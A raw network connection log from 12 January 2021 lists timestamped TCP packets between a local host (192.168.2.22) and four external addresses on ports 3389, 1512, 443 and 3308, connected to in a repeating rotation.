Jan 12, 2021 01:45:58.517548084 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.517596960 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.517832041 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.517888069 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.523349047 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.577543974 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.635557890 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:58.688575983 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:58.688708067 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:58.690495968 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:58.743256092 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:58.750144005 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:58.750186920 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:58.750256062 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:58.750284910 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:58.766154051 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:58.820050001 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:58.820274115 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:58.829695940 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:58.830010891 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:58.883188009 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:58.883471966 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:58.922418118 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:58.936314106 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:58.936366081 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:59.040020943 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:59.040070057 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:59.040337086 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:59.045967102 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:59.098766088 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:59.163614988 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.215993881 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:59.216118097 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.217196941 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.269330978 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:59.286123991 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:59.286235094 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.296787024 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.351546049 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:59.351974964 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.361274004 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.361428976 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.413727045 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:59.413988113 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.466312885 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:59.466509104 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:59.585134029 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:59.585180044 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:59.585496902 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.591115952 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:59.643615961 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:59.712049961 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:59.755317926 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:59.755511999 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:59.757582903 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:59.800767899 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:59.811322927 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:59.811367035 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:59.811440945 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:59.811499119 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:59.825804949 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:59.871406078 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:59.871586084 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:59.882241011 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:59.882587910 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:59.925720930 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:59.925875902 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:59.966248989 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:59.969232082 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:59.969286919 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:00.081749916 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:00.081795931 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:00.082060099 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:00.087740898 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:00.131115913 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:00.195573092 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.249736071 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.249949932 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.251496077 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.305804014 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.328289986 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.328339100 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.328491926 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.328542948 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.341321945 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.402087927 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.402384043 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.412592888 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.412703037 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.467042923 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.467433929 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.506392002 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.523140907 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.523703098 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.612731934 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.612781048 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.613038063 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.618530035 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:00.672825098 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:00.741738081 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:00.794732094 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:00.794877052 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:00.796363115 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:00.849159002 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:00.855917931 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:00.855956078 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:00.856065035 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:00.870238066 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:00.924515963 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:00.924798965 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:00.935009003 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:00.935281992 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:00.988214016 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:00.988346100 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:01.026495934 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:01.041335106 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:01.041363001 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:01.145601034 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:01.145642042 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:01.145735025 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:01.145780087 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:01.152383089 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:01.205316067 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:01.279803038 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.331696987 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:01.331918001 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.333493948 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.385198116 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:01.400849104 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:01.400983095 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.415095091 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.469305038 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:01.469409943 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.476197004 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.476393938 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.528223991 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:01.528331995 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.567065954 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:01.580063105 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:01.698235989 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:01.698292971 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:01.698460102 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.701610088 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:01.753460884 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:01.817976952 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:01.861464977 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:01.861654997 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:01.863378048 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:01.906383991 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:01.917752981 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:01.917783976 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:01.917891979 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:01.917947054 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:01.933588982 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:01.978574991 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:01.978748083 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:01.989120960 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:01.989490986 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:02.032814980 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:02.033094883 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:02.072690010 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:02.076452971 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:02.076494932 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:02.189266920 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:02.189312935 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:02.189682007 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:02.195328951 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:02.238746881 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:02.316961050 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.370652914 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.370832920 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.372457027 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.428245068 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.452135086 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.452172041 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.452374935 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.452425003 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.465975046 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.527468920 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.527627945 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.535310030 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.535465956 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.589225054 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.589633942 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.628966093 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.642906904 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.642937899 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.732197046 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.732245922 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.732562065 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.737984896 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:02.791275978 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:02.847517967 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:02.900496960 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:02.900624990 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:02.916256905 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:02.969089985 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:02.975934029 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:02.975986958 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:02.976099014 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:02.990900993 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:03.044821978 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:03.045013905 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:03.057174921 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:03.058525085 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:03.112994909 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:03.113253117 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:03.166192055 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:03.266757011 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:03.266802073 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:03.267133951 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:03.272682905 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:03.325598001 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:03.393341064 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.445929050 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:03.446127892 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.447501898 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.499758005 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:03.514745951 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:03.514920950 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.529364109 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.583986998 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:03.584156036 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.596818924 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.596987963 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.649154902 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:03.649502039 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.687227964 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:03.701869011 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:03.819216013 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:03.819257021 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:03.819380999 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.819431067 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.824388981 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:03.876467943 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:03.935148954 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:03.978354931 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:03.978574038 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:03.980056047 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:04.023160934 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.034003019 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.034035921 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.034135103 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:04.034188032 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:04.048309088 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:04.093213081 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.093549967 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:04.103425026 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:04.103626013 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:04.146732092 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.147092104 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:04.186568022 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.190205097 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.190433979 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.302870035 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.302917957 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.303246975 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:04.309300900 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:04.352782965 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:04.423681974 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.479562998 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.479814053 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.481293917 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.535254002 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.558183908 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.558228970 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.558397055 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.571760893 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.635962963 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.636068106 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.645836115 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.645939112 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.699829102 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.700082064 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.738944054 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.754215956 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.754257917 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.845467091 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.845520020 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.845773935 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.851418972 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:46:04.905646086 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 01:46:04.967431068 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.020734072 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.020953894 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.022633076 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.075351000 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.082432032 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.082473040 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.082638025 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.083189964 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.098772049 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.152929068 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.153273106 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.169787884 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.169948101 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.222728014 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.222955942 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.262676954 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.275979996 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.377367973 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.377494097 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.377675056 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.377728939 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.383426905 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:46:05.436494112 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 01:46:05.500041008 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.552427053 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:05.552649975 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.554439068 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.606445074 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:05.621118069 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:05.621277094 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.634901047 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.690351009 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:05.690713882 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.701684952 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.702148914 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.755141973 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:05.755492926 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.807662010 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:05.925539970 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:05.925585032 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:05.925880909 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.931582928 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:46:05.983742952 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 01:46:06.045939922 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.089315891 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.089510918 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.090584040 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.133780956 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.144329071 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.144373894 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 01:46:06.144479990 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:46:06.144519091 CET	49399	3308	192.168.2.22	80.86.91.27
